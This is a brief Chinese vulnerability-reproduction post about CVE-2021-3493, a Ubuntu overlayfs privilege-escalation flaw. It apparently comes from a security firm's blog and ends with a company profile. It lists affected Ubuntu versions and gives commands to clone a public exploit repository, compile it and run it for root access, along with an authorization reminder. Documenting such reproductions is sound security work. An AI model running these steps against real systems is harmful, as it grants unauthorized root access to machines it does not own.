漏洞复现 CVE-2021-3493 Linux kernel特权提升漏洞复现

0x01 漏洞描述

    Linux内核是操作系统的关键组件。它借助进程间通信和系统调用，在硬件级别上充当应用程序和数据处理之间的桥梁。Linux内核中overlayfs文件系统中的Ubuntu特定问题，它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁，因此本地攻击者可以使用它来获得更高的特权。

0x02 漏洞复现

漏洞影响: 

Ubuntu 20.10

Ubuntu 20.04 LTS

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 ESM

1.使用Ubuntu 18.04.5 LTS系统，查看系统版本

grep PRETTY /etc/os-release

2.下载提权脚本，运行，提权成功

1.下载攻击脚本：git clone https://github.com/briskets/CVE-2021-3493
2.编译脚本，生成exp：gcc exploit.c -o exploit
3.赋权，并执行exp：chmod +x exploit./exploit

(注：要在正规授权情况下测试网站：日站不规范，亲人泪两行)

0x03 公司简介

江西渝融云安全科技有限公司，2017年发展至今，已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司，是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证，拥有软件著作权十八项；荣获2020年全国工控安全深度行安全攻防对抗赛三等奖；庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制：sm

审核：fjh

审核：Dog

原文始发于微信公众号（融云攻防实验室）：漏洞复现 CVE-2021-3493 Linux kernel特权提升漏洞复现